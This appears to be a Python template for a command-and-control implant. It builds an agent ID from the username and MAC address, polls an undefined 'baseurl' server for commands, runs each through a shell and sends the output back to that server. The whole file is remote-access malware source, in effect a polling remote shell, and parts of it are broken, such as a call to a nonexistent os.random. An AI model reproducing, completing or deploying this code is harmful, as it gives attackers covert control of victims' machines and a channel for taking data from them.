
#####   BEGIN TEMPLATE  #####
import os, time, _thread, requests
from uuid import getnode
from subprocess import Popen, PIPE

def run_cmd(cmd):
        if ' ' in list(cmd) and cmd.split(" ")[0] == "cd":
                newdir = cmd.split(" ")[1]
                try:
                        os.chdir(newdir)
                        return "cd: newdir"
                except:
                        return "cd: %s: error" % newdir
        else:
                res = Popen(cmd,stdout=PIPE,shell=True).communicate()[0]
                try:
                        return res.decode()
                except:
                        return str(res)

mac = getnode()
user = run_cmd("whoami")
agent = ''

try:
	agent += user[0]
	agent += user[1]
	agent += user[2]
	agent += user[3]
except:
	pass
try:
	agent += mac[-1]
	agent += mac[-2]
	agent += mac[-3]
	agent += mac[-4]
except:
	pass

if agent == "":
	agent = run_cmd("whoami")
if agent == "":
	agent = os.random(2)
def ping(): requests.get(baseurl+"/new?agent="+agent)
def reply_cmd(cmd,id):
        res = run_cmd(cmd)
        requests.get((baseurl+"/res?id=%s&result=%s" % (id,res)))
while True:
        try:
                time.sleep(1)
                ping()
                cmd = requests.get(baseurl + "/cmd?agent="+agent)
                if not cmd.content.decode() == "none":
                        data = cmd.json()
                        cmd = data['cmd']
                        id = data['id']
                        _thread.start_new_thread(reply_cmd, (cmd, id, ))
        except Exception as e:
                print("error: "+str(e))
